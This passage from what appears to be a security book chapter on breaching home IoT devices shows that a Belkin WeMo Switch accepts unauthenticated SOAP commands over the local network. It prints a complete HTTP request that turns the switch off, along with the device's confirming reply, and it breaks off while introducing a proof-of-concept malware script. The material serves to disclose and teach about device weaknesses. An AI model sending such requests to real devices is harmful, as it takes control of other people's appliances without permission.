</device>
</root>Notice the remoteaccess1 service. It is invoked similarly to the example listed for WeMo
Baby. However, there is an extra service here called basicevent1. It turns out that if the user is
on the same WiFi network as the Switch, it is possible to connect to this service and issue a
command to toggle the Switch:
POST /upnp/control/basicevent1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"
Content-Length: 316
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent: CyberGarage-HTTP/1.0
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>0</BinaryState>
</u:SetBinaryState>
</s:Body>
</s:Envelope>The BinaryState value is set to 0 , which commands the Switch to toggle to the off posi-
tion. The Switch responds:
HTTP/1.1 200 OK
CONTENT-LENGTH: 285
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Mon, 14 Oct 2013 10:58:26 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>0</BinaryState>
</u:SetBinaryStateResponse>
</s:Body> </s:Envelope>The HTTP OK response, along with the confirmation of the BinaryState value of 0 , indi-
cates that the Switch was able to successfully turn off power to the connected appliance.
Isaac Kelly has created a proof-of-concept toolkit in Python to test local access to the
WeMo Switch. For demonstration purposes, a simple malware script with local access can
CHAPTER 3: ASSAULTING THE RADIO NURSE—BREACHING BABY MONITORS AND(^82) ONE OTHER THING